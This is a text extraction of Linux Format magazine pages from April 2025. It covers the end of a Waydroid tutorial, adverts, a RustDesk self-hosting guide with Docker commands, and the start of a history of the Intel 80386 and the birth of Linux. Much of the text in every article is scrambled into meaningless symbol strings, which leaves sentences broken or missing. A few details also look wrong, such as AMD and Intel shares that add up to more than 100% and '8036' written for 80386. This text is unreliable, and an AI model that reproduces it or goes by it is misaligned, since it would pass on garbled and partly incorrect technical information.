apps can then be moved, resized, minimised and more the step-by-step guide (opposite).
20&+$1%",+v0 /""+ ,+1/,)0n'201)&("/"$2)/-/,$/* You’ll also find lots of useful tips and tricks on the official docs
windows. This enables you to have multiple apps on 0&1"ƒhttps://docs.waydro.id), including user-developed tweaks like
screen at once – if you’re running Waydroid itself in setting up a shared folder for easily transferring data to and from
full-screen mode, they appear over the main desktop; your virtual instance of Android directly from your desktop.
&#6,2)2+ %1%"*3&1%"&/)2+ %"/0%,/1 21n1%"6 If you run into problems with Waydroid, using a search engine
appear within their own self-contained window. usually brings up conversations across various forums, including
Other tweaks are self-explanatory, but two worth Reddit, or you can contact the developers directly through Waydroid
examining are Persist.waydroid_width and Persist. groups on Telegram and Matrix (links on at https://waydro.id).
waydroid_height, which enable you to set a custom Finally, if you’d like to help fund future development through a
resolution for your Waydroid desktop (for example, one-off or regular donation, visit https://opencollective.com/
1,800 height and 810 width for a phone-like 20:9 waydroid for details.
resolution). One drawback of this is that if you switch

WE'RE ALREADY A MOBILE FORMAT Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux April 2025 LXF326 63

BACK ISSUES

BACK ISSUES MISSED ONE?

ISSUE 325 ISSUE 324 ISSUE 323
March 2025 February 2025 January 2025

Product code: Product code: Product code:

LXFDB0325 LXFDB0324 LXFDB0323

In the magazine In the magazine In the magazine

Protect your Get inside open Follow our pick
network with our in-depth guide to AI and discover how to train your of Raspberry Pi projects and kick-
firewalling your home, and take a own chatbot, as well find out which start your maker hobby. Plus, learn
deep dive into Intel’s new Arc series existing free chatbot we think is the all about Fyne, the toolkit that
of GPUs. You can also discover how best in this month’s Roundup. Plus, makes it easy to build cross-
to up your password security, take a step back in time with our platform apps. We also take a look
contribute to OpenStreetMap, look at plotters, build your own at five of the best IDEs, and some of
stream audio with Auracast, relive Steam Deck alternative, explore the the latest distro releases. And you
the world of data punch cards, and new Pi 500, code your own Space can get stuck in with tutorials on
upgrade your router. Plus, discover Invaders game, take a look at the rescuing deleted files, backing up
the best screen recorder, catch up latest distro releases, catch up on web pages, getting involved with
with open source news, and more. open source news, and loads more. OpenStreetMap, and much more.

ISSUE 322 ISSUE 321 ISSUE 320

December 2024 November 2024 October 2024

Product code: Product code: Product code:

LXFDB0322 LXFDB0321 LXFDB0320

In the magazine In the magazine In the magazine

Power up the Build your own Discover how
latest version of Fedora, and join our Linux fortress and protect your to make your home brighter and
meditation on AMD’s new Zen 5 privacy with Qubes OS, and learn all smarter with open source tech,
architecture. Plus, find out which is about Matter, the new Internet of +!#&+!,214%"1%"/1%" 
the best big-name browser, code Things standard. Plus, discover &0+61%&+$*,/"1%+*/("1&+$
your own captcha, create a mesh which media server is best, find speak. You can also speed up your
VPN, manage your ebook library, ,21%,41,0" 2/"6,2/#&)"0n12+" downloads, tweak network settings,
capture infrared photos on your Pi, &+1,/!&,01/,+,*6n*01"/ n upgrade your graphics card, and
upgrade your memory, and much upgrade your monitor, follow our Pi emulate both a Psion PDA and the
more. And we also have our usual Pico projects, and more. And don’t Enigma machine. We also have a
packed news section with all the forget to keep up to date with all Roundup of the best beginner
latest from the open source world. our open source news and views. distros, and so much more to enjoy.

To order, visit www.magazinesdirect.com

Select Single Issues from the tab menu, then select Linux Format.

Or call the back issues hotline on 0330 333 1113

or +44 (0)330 333 1113 for overseas orders.
Quote the product code shown above and have your credit or debit card details ready.

64 LXF326 April 2025 www.linuxformat.com

 UK readers
USA? EU? THE MOON?
*
turn to
p16

Don’t wait for the latest issue to reach your local store –
subscribe today and let Linux Format fly straight to you.

2 GREAT
WAYS TO
SUBSCRIBE
Print + NEW
digit
access or al
digital-only
!

USA REST OF THE WORLD EUROPE

From $135.49 From $135.49 From €119.49
For 13 issues For 13 issues For 13 issues

IT’S EASY TO SUBSCRIBE!

Visit www.magazinesdirect.com/linux-format
Call +44 0330 333 1113
Lines open Monday-Friday, 9am-5pm GMT

Or 1-844-779-2822
Lines open Monday-Friday 8.30am-5pm EST
*We don’t actually deliver to the Moon. Yet.

www.techradar.com/pro/linux April 2025 LXF326 65

TUTORIALS RustDesk

RUSTDESK
Credit: https://rustdesk.com

Self-host remote
access with RustDesk
Remote-control software is useful, but Tam Hanna suggests self-hosted
remote control software based on open source technology is even better.

emote desktop connections are nothing new.

R ,/"1%+:86"/0$,n1%"3"+"/)"
protocol enabled this writer to access their
&"++v,2+!4,/(011&,+#/,*/,!o 2/1%"/*,/"n
 "00&+$1%"%"!)"000"/3"/40*!"*2 %
OUR "0&"/3&&100"/3& "o
+-/ 1& "n%,4"3"/n&0+,1-/1& 2)/)6
EXPERT ,*#,/1)"o &/01)6n1%"4,/(011&,+1%1&01,"
Tam Hanna /"*,1"v ,+1/,))"!202))6+""!01,-2)& )6"5-,0"1%"
often finds -,/14%"/"1%"0"/3"/4&))4&1#,/ ,**+!0o
himself press- %&0/".2&/"0/,21"/ ,+#&$2/1&,++!&0#&/01v$/!"
ganged into IT attack vector for every type of miscreant seeking to
admin duty for add a new machine to their botnet. Keep in mind that
friends and Towarisch Haxxor never sleeps and that port scans
family. Sadly, "5-)& &1)60"/ %#,/0"/3& "0o
TeamViewer, sorry,
they are usually On the other hand, a service such as TeamViewer yķĬij ÐĬüǏìĬǏĨЭÌőǎijČǎéÐÿĥƧ
a few hours’ /".2&/"01%"&+-211&+$,#+ x-2+ %&+$1%/,2$%1%"
worth of travel various routers is handled by the operator. This can be
away from of great value when the system to be administrated
ǠǫɽࢳŹʠȥȇơɭࡳ has a dynamic IP address; services such as http:// machines can communicate directly, screen and
heise.de/ip tend to be a major challenge for technically control data flows between the two machines without
unsophisticated users. an intermediary relay.
In principle, RustDesk realises the user experience In practice, however, the two servers often can’t
that users of TeamViewer know and like. The user directly communicate with one another due to
&+1"/# ",+1%"#/,+1v"+! (see screenshot, above- firewalls, NATs and various other realities of modern
right) is difficult to distinguish from what is rendered computer internet working.
6&10)/$"/n4"))v"01)&0%"! ,*-"1&1,/o In this case, a second server called the relay server
,01&*-,/1+1)6n0&$+))&+$0"/3& "%")-01%" is brought into the connection. This machine acts as an
)&"+1 ,*-21"/ ,++" 11,1%"/"*,1" ,*-21"/x&+ intermediary between the two machines, ensuring data
RustDesk lingo, the client computer is the machine can be exchanged without network reconfiguration.
that takes control of the remote computer. If the two In the interest of efficient product promotion, the
RustDesk team provides a basic complement of
servers of its own. However, serious open source
aficionados and people who are concerned about
performance are well advised to host their own
servers. Hosting can be done either in the cloud or
,+-/, "00 ,*-21"/x#,/0*))&+01))1&,+0n1%"
0601"*/".2&/"*"+100-" &#6*&+&*2*,#9 ,#
/+!,* "00*"*,/6o!)6n=9:* %&+"0
++,1"20"!n4%& %!&0.2)&#&"00,*",#1%""/)&"01
Raspberry Pi models.

Installing the client

The first and most important step involves installing
RustDesk presents itself as mostly platform-agnostic. 1%" )&"+1x4&1%,21&1n4,/(011&,+,/)-1,- ++,1

66 LXF326 April 2025 www.linuxformat.com

 RustDesk TUTORIALS

-/1& &-1"&+1%"/"*,1"v ,+1/,) RustDesk enables

őČķǎijČǎĬŋìijÆéǎ
fun and games hosted in the
ÅÐijŋÐÐĆǎijéÐǎijŋČǎ
RustDesk environment. ĬÆĨÐÐĆĬǎČãǏijéÐǎ
While many distributions carry target system.
RustDesk in their package
repository, the best approach
&+3,)3"03&0&1&+$1%" &1 2
repositories’ release directory. It
can be found at https://github.com/
rustdesk/rustdesk/releases and
provides a table with downloads
#,/))02--,/1"!/ %&1" 12/"0n0
shown (see screenshot, opposite
page, bottom).
At the time of writing, version
9o;o?&0 2//"+1o"4&))!,4+),!
the version for Ubuntu and install it on our main Ubuntu Anyway, the actual connection management works
:8o8<4,/(011&,+o)& (&+$1%"!,4+),!)&+(&+ -/"1164"))o ,/"5*-)"n ,+1/,))&+$!2)v0 /""+
the table then leads to the deployment of a file called 4,/(011&,+&0+,1-/,)"*x00%,4+(above), the Where remote-
rustdesk-1.3.7-x86_64.deb. selection interface lets you select which of the two control software
The program’s installation occurs via the software 0 /""+0,#1%"/"*,1"1,&+1"/ 14&1%o is, tech-support
"+1/"x!,2)"v )& (,+1%"#&)"&+Nautilus is usually ,*-/"!1,TeamViewern#"42+&.2"0-" 10 scammers are
enough to start the program’s installation routine. /"3&0&)"o &/01)6n6!"#2)11%"3&"4#,)),401%" not far away.
Installing RustDesk,++&+25v"+)"!0601"* interaction pattern well known from strategy games In the case
of RustDesk,
/".2&/"0!!&1&,+)*+&-2)1&,+o 2/1%"/&+#,/*1&,+ such as Command and Conquer. Once the mouse
multiple
on this can be found by visiting the dedicated pointer reaches the border of the window, the display imposter
instructions found at https://rustdesk.com/docs/en/ /"0 /,))0),+$o ,/12+1")6n1%&00,*"4%1 websites have
client/linux/selinux/. confusing behaviour can be disabled by clicking sprung up –
"4/"1%11%"RustDesk client starts up 1%"*,+&1,/-& 1,$/*3&0&)"&+1%"0 /""+0%,1x&1 make sure you
immediately after installation, displaying the opens a menu providing the user with a wide variety use the official
TeamViewerv"0.2"&+1"/# "0%,4+&+1%"0 /""+0%,1 ,#0 )&+$,-1&,+0-"/*&11&+$6,21,12+"0601"* website located
(left). 6!"#2)1n1%"-/,$/*01/1021,*1& ))6x,+ behaviour to your needs. at https://
Ubuntu workstations, this can be checked by looking The record button does what it says on the tin and rustdesk.com.
for the blue RustDesk& ,+&+1%"1,-v/&$%1 ,/+"/,# activates the screen recording feature. An interesting
the main screen. .2"01&,+ ,+ "/+01%"-) "*"+1,#1%"/" ,/!&+$0o
"1%10&1*6n1%"+"51 1&+3,)3"0#&+!&+$ On our Ubuntu workstation, the files were domiciled in
0" ,+!4,/(011&,+&+1"+!"!#,//"*,1")6v ,+1/,))&+$ the Videos folder and had a filename structure similar
the first one. to RustDesk/outgoing<string>_vp9.webm.
,//"0,+0,#-,01"/&16n1%"+"5101"-04&))1(" &+))6n6,2+""!1,"4/"1%1n6!"#2)1n
-) ",+)-1,-/2++&+$2+123"/0&,+::o8<o RustDesk also transmits the sound from the remote
The RustDesk )&"+1&0!"-),6"!3&1%" &1 2 ,*-21"/1,1%" )&"+1 ,*-21"/o&0)&+$1%&0
repository outlined above. The connection process 0,*"1&*"0++,6&+$"%3&,2/&0!,+"3&1%",3"v
works generally as we would expect from TeamViewer mentioned monitor pictogram; this particular option is
x0!)6n1%"--)& 1&,+,+1%" ,*-21"/"&+$ ))"!21"o
controlled does not provide any kind of graphical The text chat option also deserves an honourable
indication of the actual connection. mention. When activated, the screen of the machine

IOS SUPPORT FOR RUSTDESK

It sounds weird, but being able App Store is not handled by the join/KBG9EsZW on the device
1,/"*,1"v ,+1/,)4,/(011&,+ !"3"),-*"+11"*x&#6,220" that will host the test version
from a phone can help out in +&%,+"+!),,(#,/RustDesk, ,#RustDesk.
-&+ %o!)6n!&01/&21&+$ you will find a build uploaded by a %"+20&+$"01 )&$%12&)!0n
applications in Apple’s relatively third party. you should bear in mind that
closed iTunes ecosystem is a At the time of writing, the only Apple imposes strict expiration
challenge. Tam has provided a way to get an official and regularly rules on them. In practice, this
vast array of videos at https:// updated build of RustDesk is to means that each build has a
bit.ly/lxf326play, exhibiting 20"--)"}0"01 )&$%10601"*n )&#"1&*",#,+)6A8!60+!$"10
workarounds for the various 0,21)&+"!&+1%"3&!",#,2+!1 !&0)"!#1"/1%1o ,/12+1")6n
problems and roadblocks Apple https://bit.ly/lxf326maui. Joining 1%""01 )&$%1--)& 1&,+
erects in front of developers. 1%""01 )&$%1-/,$/**" + -/,3&!"0+"5-&/1&,+1&*"/x
In the case of RustDesk, the " ,*-)&0%"!6"+1"/&+$1%" '201"02/"1, %" (&1"#,/"
binary distribution into the iTunes  https://testflight.apple.com/ departing on that epic trip.

www.techradar.com/pro/linux April 2025 LXF326 67

TUTORIALS RustDesk

Finding a smart 201"0(&+!,4 0-"+,-1&,+

Æé­ijǎÐŐ­ąĥÿÐǎ
can limit interaction possibilities.
ijÐŐijǎìĬǎĆČijČĨìČķĬÿőǎ
difficult. %&0n%,4"3"/n/&0"0 %& ("+v+!v
egg problem when working with a
headless computer that does not
have a mouse, keyboard and
0 /""+ ,++" 1"!,/&0), 1"!&+
!&##& 2)1v1,v "00/"o
Another method that increases
security and leads to better
availability, as your system is
+,),+$"/!"-"+!"+1,+0%/"!
/"0,2/ "0n&01%"0")#v%,01&+$,#1%"
communication servers mentioned
in the technical description above.
,/1%&0n+6 ),2!v0"!
provider such as AWS, Azure,
,,$)"),2!,/+!"5 +
"20"!o0*"+1&,+"!,3"n
resource demands are minimal if
being controlled pops up a chat window similar to the the server handles a low number of simultaneous
one shown in the screenshot (above). It can be used to connections. Alternatively, it is possible to force a
$&3"0&!"v %++")&+01/2 1&,+01,%2*+,-"/1,/ process computer into duty.
0&11&+$&+#/,+1,#1%"* %&+"x1%"*,01 ,**,+ %"#,)),4&+$01"-04&))20"0-"//6&<
example would concern switching on or off the printer ,+#&$2/"!1,/2+><v&13"/0&,+,#1%"0-"//6
or similar peripheral device. &,,(4,/*,-"/1&+$0601"*o

Securing your infrastructure Self-hosting

"*,1"v ,+1/,)&+1"/# "0n-/1& 2)/)61%" ")#v%,01&+$RustDesk comes with its own problems,
protocol, are considered prime attack vectors for particularly when a group of ports needs to be opened.
))(&+!0,#*)4/"o +1%" 0",# RustDesk, a wide ,/0")" 1&+$1%"-,/10n1%"#,)),4&+$!"0 /&-1&,+,#1%"
variety of security features exist to limit the amount port complement used shall serve as the first approach
,#!*$",/-,1"+1&)!*$"o /,))&+$!,4+1%" to the topic:
Security tab shown in the screenshot (below) reveals hbbs - RustDesk ID (rendezvous / signaling) server,
+2*"/,#,-1&,+01%1 +"20"!1,%/!"+6,2/ listen on TCP (21114 - for http in Pro only, 21115, 21116,
security deployment. 21118 for web socket) and UDP (21116)
,/"5*-)"n1%"0" 4%&1")&01&+$,-1&,+ + hbbr - RustDesk relay server, listen on TCP (21117,
)&*&11%"/+$",# )&"+10-"/*&11"!1, ,++" 11,1%" 21119 for web socket)
,*-21"/o)1"/+1&3")6n1%"+)6)),4,++" 1&,+ # A more detailed description of the ports needed can
be found in the documentation by visiting https://
rustdesk.com/docs/en/self-host/.
While configuring your local firewall is outside the
scope of this article, the actual deployment of the
server software can take place in two different forms.
&/01)6n1%" ,!" +" ,*-&)"!,/!,4+),!"!0
-/" ,*-&)"!&+/6n1%"+!"-),6"!)&("+6,1%"/
piece of code.
Alternatively, the RustDesk team provides a set
,#Docker ,+1&+"/01%1-/,3&!""3"/61%&+$/".2&/"!
to host the servers for a RustDesk/"*,1"v ,+1/,)
workflow. When studying the documentation, one
+)*,01$"11%"&*-/"00&,+1%11%"20",#Docker
containers is considered the preferred approach of the
RustDesk!"3"),-*"+11"*x1%&0&02+!"/01+!)"
in a way, because nowadays servers can have widely
3/6&+$)&//&"0+!/ %&1" 12/"0oDocker acts as
a unifying force here, thereby reducing the number of
201,*"/0"/3& "/".2"010o
,/1%"#,)),4&+$01"-0n4"/"20&+$1%"Docker
option. The first act involves setting up the Raspberry
Pi. Next, follow the Docker installation steps provided
at https://docs.docker.com/engine/install/raspberry-
pi-os/. When done, make sure that you can run the test
container to prove that the container environment

ǎĬÆĨČÿÿǎÅ­ĨǎŋČķÿÌǎé­ŊÐǎäĨЭijÿőǎ­ìÌÐÌǎÌìĬÆČŊÐĨőǎéÐĨÐƧ works on your Raspberry Pi. Should you wish to run

68 LXF326 April 2025 www.linuxformat.com

 RustDesk TUTORIALS

1%"0"01"-0,+><v&13"/0&,+,#1%",-"/1&+$
system, you should instead follow the guide found at PAYING FOR IT
https://docs.docker.com/engine/install/debian/.
The actual server environment, which happens to Even though RustDesk&0,-"+0,2/ "+!#/""v0v&+v""/n1%"
consist of multiple packages, can then be downloaded developers also provide a paid option for the server component,
by entering the following command: billed on a per user basis. The price list found at https://rustdesk.
$ sudo docker image pull rustdesk/rustdesk-server com/pricing01/104&1%[98-"/*,+1%-)+n4%& %-/,3&!"0
1!,4+),!03/&,20)6"/0n4%& %/"/".2&/"!#,/ ,3"/$"#,/2-1,:8/"*,1"!"3& "0o
the successful execution of the RustDesk server. After %"-&!-)+}0*,01&*-,/1+1!!"!v3)2"#"12/"&0&104"
that, the individual servers can be started by entering &+1"/# "o%"0"/3"/"5-,0"0*+$"*"+1 ,+0,)"1-,/1:999<n
commands such as the following: 4%& % +"20"!1, ,+#&$2/" "00-"/*&00&,+0o)&"+10+!
$ sudo docker run --name hbbs -v ./data:/root -td users can be assigned interaction rights in a fashion not dissimilar to
--net=host --restart unless-stopped rustdesk/rustdesk-  1&3"&/" 1,/6o+,1%"/3)2"v!!"!#"12/",#1%"-&!3"/0&,+&0
server hbbs connection logging. When interacting with a paid server, it records
$ sudo docker run --name hbbr -v ./data:/root -td detailed information about sent files and connection times.
--net=host --restart unless-stopped rustdesk/rustdesk- &+))6n1%"-&!3"/0&,+,#RustDesk provides an address book.
server hbbr This means that a list of all clients is provided on a website, greatly
Of course, the parameters provided to the Docker simplifying connection to remote clients without having to keep a
instances must be modified according to the network’s ),$,#1%"&/&+!&3&!2) 0o 2/1%"/&+#,/*1&,+,+1%"#"12/"0#,2+!
operational state. However, this is beyond the scope of in the paid version can be found at https://rustdesk.com/docs/en/
this article. self-host/rustdesk-server-pro/o,*-+&"01%120"RustDesk
heavily should definitely give the product a go.
Configuring clients
After the server has been set up successfully on
1%"0-"//6&n1%"&+!&3&!2) )&"+10+""!1," similarly to the way in which ours is, do as follows:
informed about the new infrastructure. In particular, ~/data $ cat id_ed25519.pub
the RustDesk clients provide the network settings xPOTq5++Nt3zC+efR8CyZORBu57uJkALxERTHA02ZV
window, which can be parametrised similarly to the o=pi@raspberrypi:~/data $
way shown in the screenshot (bottom-right). Of Interestingly, the cat command does not append a
course, your server’s public IP must be entered here //&$"/"12/+1,1%" (,#1%",21-21o2"1,1%1n
instead of the local dummy IP shown in the screenshot. the correct public key in the output above would be the
2/1%"/*,/"n!,+,1#/"1&#1%"RustDesk client asks string xPOTq5++Nt3zC+efR8CyZORBu57uJkALxERT
6,2#,/6,2/20"/-004,/!x*,!&#6&+$0"11&+$0+! HA02ZVo=. It then must be put inside the Key field of
starting or stopping the RustDesk0"/3& "/".2&/"1%" the dialog shown in the screenshot (below). Usually, the
user password to prevent abuse by people loafing system will work after this.
around in front of the terminal. All those seeking an open source alternative
At this point, a small smoke test can be done. If the 1,TeamViewer ++,4/"01&+-" "xRustDesk
client installed on one machine is connected to the provides exactly what is demanded. Even though
Raspberry Pi while the other client is still set up to use 1%"0601"*4,/(0/"0,+)64"))4&1%1%"3"+!,/v
the normal global infrastructure, connection attempts provided public servers, good practice dictates that
will fail, with errors pointing to the remote target heavy users should host their own relay servers, which
system’s offline status. This behaviour usually occurs further increases security.
even if both computers are resident
on the same subnet and can ping
one another directly.
If a RustDesk server is intended
solely for use in a local network, both
ad blockers and NAT servers can
cause trouble. Some information,
geared especially towards users
,#Pi-hole and AdGuard, can be
found by visiting https://rustdesk.
com/docs/en/self-host/nat-
loopback-issues/.
+0,*" 0"0n0")#v ,+#&$2/"!
instance of RustDesk throws up an
infamous key mismatch error. This
+202))6"0,)3"!0&*-)6o &/01n
return to the server hosting the
actual Docker containers, and check
its data folder for the key file. Should
you use a Raspberry Pi configured ƒéìĬǎÌì­ÿČäǎìĬǎķĬÐÌǎãČĨǎ?vǎÐĆijĨőƧ

WE CAN WORK REMOTE TOO… Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux April 2025 LXF326 69

TUTORIALS Linux hardware
Part One!
Don’t miss

LINUX HARDWARE
next issue,
subscribe on
page 16!

The hardware
that made Linux great
To kick off our new series, Mike Bedford delves into the now largely
forgotten 80386, which is where Linux first saw the light of day.

oday’s desktop PC market is dominated by

T AMD and Intel processors, so there can be

little doubt over what ISA (instruction set
architecture) the majority of Linux users are employing.
This, of course, is the x86, and according to a recent
OUR survey of Linux gamers conducted by Steam, 73.6%
use AMD chips and 29.6% use Intel CPUs. Beyond
EXPERT gamers, ARM also gets a look-in, of course, thanks to
Mike Bedford the Raspberry Pi and Android deployed on the dizzying
only discovered array of mobile devices.
Linux quite late Despite this, it would be far short of the mark to
in his computing consider Linux as restricted to a particular family of
journey, so hardware, as is the case with Microsoft Windows. By
learning more way of contrast, Linux is almost certainly the operating
about the system that has been – and probably still is – available
hardware that for the widest range of hardware. In our new series on
gave birth to the hardware that made Linux great, we’re going to
Linux provided examine this broad spectrum of hardware. This will
an interesting take us from one extreme to the other, that’s from the
diversion. cheapest to the most powerful of computers, and
with lots more in between. As a taster of where
we’re going, the series will comprise articles on This Compaq Deskpro 386 was the first PC to utilise
the workstations and servers of the ’80s and ’90s, the Intel 80386 32-bit processor.

1991 COMPUTING LANDSCAPE

To set the scene of what 386- aren’t discussed in the main part computers had already started
based Linux had to compete with of this article. their transition to 16 bits and
when it first came to light in 1991, By the early ’90s, the mass beyond. One of the most popular
CREDIT: Wikimedia Commons, Tecnoxarxa, CC0 1.0

let’s take a look at the computing market home computer revolution was the Commodore Amiga
landscape of the early 1990s. Or, – Sinclair ZX80, BBC Micro and range, which included the Amiga
to be more accurate, let’s delve ))x40!" !",)!o+!1%&+$0 500 that used the 16/32-bit
into what computer enthusiasts had changed a lot in those 10 Motorola 68000 processor, and
were using. We’ll see something years. Many of the computers that the fully 32-bit Amiga 3000. But
of the professional side of 1990s brought computing to the home as a computer that can trace its
computing later in the series, but had fallen by the wayside. And ancestry back to one of the ’80s
here we’re concentrating on while some hobbyists had turned greats, the BBC Micro, we also
machines that were designed their attention to the PC, other have to mention the Acorn
specifically as home computers. computers came into being to fill Archimedes. Its biggest legacy is
Of course, 386-based PCs were the gap in the home computer surely the ARM processor that
used by some well-heeled market. The ’80s might have been was designed for it. Needless to
enthusiasts, but here we’re the era of 8-bit home computers, say, we’ll be seeing more of this
considering those machines that but as the ’90s arrived, home family of chips later in the series.

70 LXF326 April 2025 www.linuxformat.com

 Linux hardware TUTORIALS

home computers and supercomputers. And we’ll was because, although some of the early versions
conclude with an investigation of today’s state-of-play. ,#&+!,404"/"3&))"&+1%"!60,#1%";@>n
In this first article, we take a look at the hardware many users were still using MS-DOS, and that limited
that gave Linux birth. And despite our reference to the software to using 640k memory. Some solutions were
vast diversity of Linux hardware, that initial hardware available to overcome that restriction, but with many
was a PC fitted with an Intel 80386 processor. users tied into legacy software, they didn’t provide a
Bizarrely, therefore, the x86 ISA that dominates the mainstream solution. So, we rather wonder if another
desktop today is where it all started 34 years ago. But part of Linus Torvalds’s motivation in writing Linux was
that statement rather downplays all those years of x86 to provide some means of utilising the 386’s advanced
development. So, to set the scene for our wide-ranging features – 32 bits, 4GB address space and all. Despite the
voyage of discovery over the next few issues, we’ll modest claims
investigate the early days of the x86 architecture. Examining x86 it made for the
operating system
To see where the Intel 80386 – otherwise known as we now know
The birth of Linux the i386 but commonly abbreviated to the 386 – fits as Linux, Linus
Our emphasis in this series might be hardware, but no in, we need to go back to 1971. To quickly cover that Torvalds’s 1991
discussion of the first Linux platform can be complete ancient history, 1971 was when the world’s first ever announcement
started a
without a recap of how Linux came into being. And we microprocessor, the Intel 4004 (see LXF282), was
revolution.
could do worse than quote Finnish university student launched. It was a 4-bit chip. This was followed by the
Linus Torvalds who wrote the original Linux kernel. The 8-bit 8008 a year later, and several more advanced
statement in question was made on 25th August 1991 8-bit chips until, in 1978, the 8086 and 8088 arrived.
on a Usenet newsgroup, this being a pre-www bulletin Both of these were 16-bit designs, so Intel processors
board. “I’m doing a (free) operating system (just a %!"3,)3"!#/,*<1,@1,9>&10&+'2010"3"+6"/0o
hobby, won’t be big and professional like gnu) for These 16-bit chips marked the beginning of the x86
386(486) AT clones. This has been brewing since April, ISA. And the 8088’s place in history was guaranteed
and is starting to get ready. I’d like any feedback on when it was chosen to power the IBM PC, which
things people like/dislike in Minix, as my OS resembles launched in 1981, and with clones following soon after.
it somewhat (same physical layout of the file-system To clarify the difference between the 8086 and the The 80386
CREDIT: Wikimedia Commons/LinuxCon Europe Linus Torvalds/ krd CC BY-SA 4.0. Sun Wikimedia Commons/htomari, CC BY-SA 2.0

(due to practical reasons) among other things).” 8088, both were 16-bit designs internally but, while the appeared back
Note Torvalds’s reference to the operating system – 8086 also had a 16-bit external data bus, this bus was in 1985, and
as yet unnamed – being free, so this was a key part of just 8 bits wide on the 8088. This meant it could be by 1991, when
Linux from the very start. And, with the advantage of used with the readily available support chips that had Linux made its
hindsight, you might be amused at his assertion that it been designed for 8-bit systems, minimising the cost appearance,
its successor
wouldn’t be big or professional. Of particular note of 16-bit computers. The 8086 and 8088 were
the 80486 had
regarding that initial announcement was the fact that available with clock speeds ranging from 5 to 10MHz.
already been
the OS was described as resembling Minix. We should The next member of the x86 family was the 80186. launched. And
point out, therefore, that Minix was a Unix clone. It was But it didn’t show up in many PCs, the most obvious while this would
developed by American-Dutch computer scientist soon result in
Andrew Tanenbaum for use by computer science the decline of
university students on low-cost hardware. In particular, 386-based PCs,
it would run on 8086 or 8088-based PCs. It comes as the 80386 lived
no surprise at all, therefore, that Linux is a Unix-like OS. to a ripe old age.
The fact that Minix would work on an 8086/88 is It continued
to be used in
interesting because it hints at the major difference that
embedded
Linux represented. As we’ll see, the Intel 8086 and
applications
8088 were introduced seven years earlier than the until Intel
80386 and were two generations older, so why did ĥķÿÿÐÌǏijéÐǎĥÿķäǎ
Torvalds choose to base Linux on the 80386, given on it in 2007.
that 386-based PCs were much more expensive than
8086- or 8088-based machines in 1991?
Prior to his Linux project, Torvalds’s home
computers were a VIC-20 and a Sinclair QL. As he
revealed in a 1992 interview with Linux News, though,
he’d been unimpressed with Intel processors, but that
changed with the 80386. After referring to machines
he’d seen running MS-DOS as “PC-contemptibles”, he
explained how he wanted something similar to Minix
running on a home PC, and he “had long since decided In addition to PC2,
the 386 found its
that anything less than a 386 wasn’t worth it”.
way into high-
But although Linus Torvalds thought of the 80386 performance Unix
as the first x86 processor worthy of his attention, workstations like
many mainstream 386 users weren’t making the most this one from Sun
of its architecture. It probably wouldn’t be a gross Microsystems.
Linux would
exaggeration to say that they were using them only as eventually turn
faster 8088s, 8086s or 80286s, benefiting primarily up in Sun’s
from the higher clock speeds available on 386s. This workstations, too.

www.techradar.com/pro/linux April 2025 LXF326 71

TUTORIALS Linux hardware

from 12.5MHz to 40MHz. Just like the first 16-bit x86

processors, the 8036 was available in two variants,
one with a narrower data bus. The 386 DX was fully
32-bit, but the 386 SX, while also having internal 32-bit
pathways, had a 16-bit external data bus. A surprise
omission – from today’s perspective at least – is that
1%"@8;@>%!+,&+01/2 1&,+0#,/#),1&+$v-,&+1
maths, although this could be added using the 80387
coprocessor. Despite that, though, the 386 was
considered by many as a game changer. Certainly,
1%";@>0-4+"!+"40&*"!1-,4"/20"/0n
211%1%0""+1%" 0"4&1%-/"116*2 %))+"4
processor generations.
In the case of the 80386, though, it didn’t end there.
This new chip started turning up in engineering
workstations. That might sound odd in the light of our
A 386-based PC exception here in the UK being the Research Machines comment about users being unable to exploit the
with MS-DOS or Nimbus, which addressed the education market. So, 386’s full potential. But we’re not comparing like with
Windows was a
we’ll gloss over that and move on to the 80286. like. Those previous comments related to ordinary
rather primitive
affair, as you can Launched in 1982, it was available from Intel with users running legacy software under MS-DOS or early
discover with ), (0-""!0#/,*= 71,9:o= 7n)1%,2$%1%&/!v versions of Windows. But when we refer to
ijéìĬǏÐąķÿ­ijČĨƧ party manufacturers pushed this to 25MHz. It differed workstations, we’re talking of power users. And we’re
from earlier x86 chips in having separate address and also talking of different operating systems, most
data buses instead of a multiplexed bus. It was also notably Unix or Windows NT, the latter being a far cry
1%"#&/015@> %&-1,-/,3&!"*"*,/6*+$"*"+1o from common or garden Windows of the ’90s. And
The 80286 made a name for itself by its inclusion with these operating systems making large amounts
&+1%" šn }0#&/01*',/2-$/!"0&+ " of memory available to users.
the original IBM PC. Appearing in 1984, this PC, was Before moving on from the 80386 chip to look at
able to take advantage of the 286’s 24-bit address 80386-based computers, we can’t resist comparing
206&+ /"0&+$1%"*"*,/6 - &16#/,*><8( the 386 processor with today’s processors. After all,
1,9>o 1)0,&+1/,!2 "!+"49>v&120#,/ unfavourable comparisons of vintage hardware has
x86 processors interfacing with internal expansion cards. become something of a tradition in our various articles
evolved from on the history of computing. Some comparisons are
16 to 32 bits, 32-bit era fairly obvious. For example, that while the 386 topped
and are now at And so we come to the 80386, which first hit the out at 40MHz, modern chips have clock speeds of up
64 bits. That market in 1985 and was another milestone for Intel. to 6.2GHz, although around 3GHz is more typical. In
latest transition This was a 32-bit chip and it represented another addition, we could mention a 32-bit instead of a 64-bit
occurred 26
major leap – from 16 to 32 bits – in seven years. It architecture, the lack of floating-point instructions
years ago, so
)0,*"+11%11%"1/+0&1&,+#/,*<&101%/,2$% unless a coprocessor was added, and a single core
when might 128-
bit x86 chips @+!9>&101,;:&10%!1("+'2019<6"/0o+! instead of somewhere between two and 64 with
appear? Most &+ 0"6,2}/"4,+!"/&+$n&14,2)!"+,1%"/9< relatively mainstream chips, and far more with
pundits reckon 6"/0"#,/"1%"5@> *!"1%")"-1,><&10o specialised devices. We could also talk about advances
it won’t happen +!!&1&,+1,1%"*,3"1,;:&10n1%";@>/,2$%1 in pipelining and superscalar technologies, with the
any time soon. another increase in clock speed, with variants ranging consequential move from several clock cycles per
However, don’t
forget that
today x86 chips
include SIMD
